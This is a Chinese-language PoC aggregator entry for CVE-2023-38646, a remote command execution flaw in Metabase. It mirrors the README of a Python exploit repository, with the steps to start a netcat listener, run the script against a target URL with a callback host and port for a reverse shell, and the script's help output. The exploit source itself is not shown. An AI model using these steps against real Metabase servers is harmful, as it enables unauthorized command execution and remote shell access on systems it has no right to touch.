POC详情: d55099022b0da7e3e17e1e1aa5c5622ee9be7d92

来源
https://github.com/AnvithLobo/CVE-2023-38646
关联漏洞
标题: Metabase 安全漏洞 (CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
描述
RCE Exploit for CVE-2023-38646
介绍
# CVE-2023-38646

A python RCE exploit for CVE-2023-38646

## Usage

### Start a Listner
```bash
nc -lvnp <port>
```


### Run the exploit
```bash
python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port>
```


### Help

```bash
python3 CVE-2023-38646.py -h

usage: CVE-2023-38646.py [-h] -u URL -l LHOST -p LPORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL to exploit (root path for metabase)
  -l LHOST, --lhost LHOST
                        LHOST for reverse shell
  -p LPORT, --lport LPORT
                        LPORT for reverse shell

```
文件快照

 [4.0K]  /data/pocs/d55099022b0da7e3e17e1e1aa5c5622ee9be7d92
├── [3.1K]  CVE-2023-38646.py
├── [1.0K]  LICENSE
└── [ 624]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。